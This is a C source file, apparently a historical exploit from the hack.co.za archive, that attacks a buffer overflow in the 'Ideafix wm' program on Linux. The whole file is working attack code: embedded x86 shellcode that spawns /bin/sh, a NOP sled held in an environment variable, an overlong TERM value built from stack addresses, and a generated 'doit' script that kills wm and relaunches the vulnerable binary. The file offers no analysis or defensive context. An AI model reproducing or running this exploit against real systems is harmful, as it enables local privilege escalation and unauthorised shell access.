/*
 * 'Ideafix wm' Exploit 4 Linux.
 */

#include <stdio.h>
#include <stdlib.h>

#define TERMSIZE        2000
#define HUEVOSIZE       5000

char *shell =
  "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
  "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
  "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

long
esp(void)
{
  __asm__("movl %esp,%eax\n");
}

int
main(void)
{

  char *ptr, *bof, *egg;
  long *addr_ptr, addr;
  int i;


  if ( !(bof = malloc(TERMSIZE)) )
    {
      printf("NoMoreMemory4bof.\n");
      exit(1);
    }

  if ( !(egg = malloc(HUEVOSIZE)) )
    {
      printf("NoMoreMemory4egg.\n");
      exit(1);
    }

  addr = esp();

  addr_ptr = (long *) bof;
  for (i = 0; i < TERMSIZE; i += 4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i <= HUEVOSIZE - strlen(shell) - 2; i++)
    *(ptr++) = 0x90;

  for( i = 0; i < strlen(shell); i++)
    *(ptr++) = shell[i];

  bof[TERMSIZE - 1] = '\0';
  egg[HUEVOSIZE - 1] = '\0';

  memcpy(bof, "BOF=", 4);
  memcpy(egg , "EGG=", 4);

  putenv(bof);
  putenv(egg);

  system("echo '#!/bin/sh' >> doit");
  system("echo -n '# We kill any instance of wm, set TERM, ' >> doit");
  system("echo 'and run the vulnerable program.' >> doit");
  system("echo '# Bisti [111097]' >> doit");
  system("echo 'killall wm' >> doit");
  system("echo 'TERM=$BOF;export TERM' >> doit");
  system("echo '/usr/local/inter-soft/ideafix-4.3.2/bin/wm' >> doit");

  system("sh ./doit");

}
/*                    www.hack.co.za              [2000]*/